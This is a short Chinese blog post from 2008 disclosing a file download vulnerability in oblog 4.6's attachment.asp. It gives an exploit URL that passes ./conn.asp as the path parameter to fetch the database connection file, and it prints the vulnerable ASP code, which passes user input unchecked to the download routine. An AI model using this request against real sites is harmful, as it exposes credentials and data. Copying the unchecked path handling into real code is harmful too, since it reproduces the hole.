oblog文件下载漏洞

作者: 天晴无名氏日期: 2008-04-04 20:20

字体大小: 小中大

oblog文件下载漏洞
漏洞存在版本4.6sql+access，一路跟踪下去吧
漏洞文件：attachment.asp
利用很简单：http://test.cn/attachment.asp?path=./conn.asp 即可下载CONN

<%
Dim Path,rs,FileID,ShowDownErr,uid,file_ext
Dim SQL
Path = Trim(Request("path"))
FileID = Trim(Request("FileID"))
If FileID ="" And Path = "" Then
Response.Write "参数不足"
Response.End
End If
If CheckDownLoad Then
If Path = "" Then
set rs = Server.CreateObject("ADODB.RecordSet")
link_database
SQL = ("select file_path,userid,file_ext,ViewNum FROM oblog_upfile Where FileID = "&CLng(FileID))
rs.open sql,conn,1,3
If Not rs.Eof Then
uid = rs(1)
file_ext = rs(2)
rs("ViewNum") = rs("ViewNum") + 1
rs.Update
downloadFile Server.MapPath(rs(0)),0
Else
Response.Status=404
Response.Write "该附件不存在!"
End If
rs.Close
Set rs = Nothing
Else
If true_domain = 1 Then
downloadFile Server.MapPath(Replace(Path,blogurl,"")),1
else
downloadFile Server.MapPath(Path),1
End If
End If
Else
'如果附件为图片的话，当权限检验无法通过则调用一默认图片，防止<img>标记无法调用，影响显示效果
If Path = "" Then
Response.Status=403
Response.Write ShowDownErr
Response.End
Else
downloadFile Server.MapPath(blogdir&"images/oblog_powered.gif"),1
End if
End if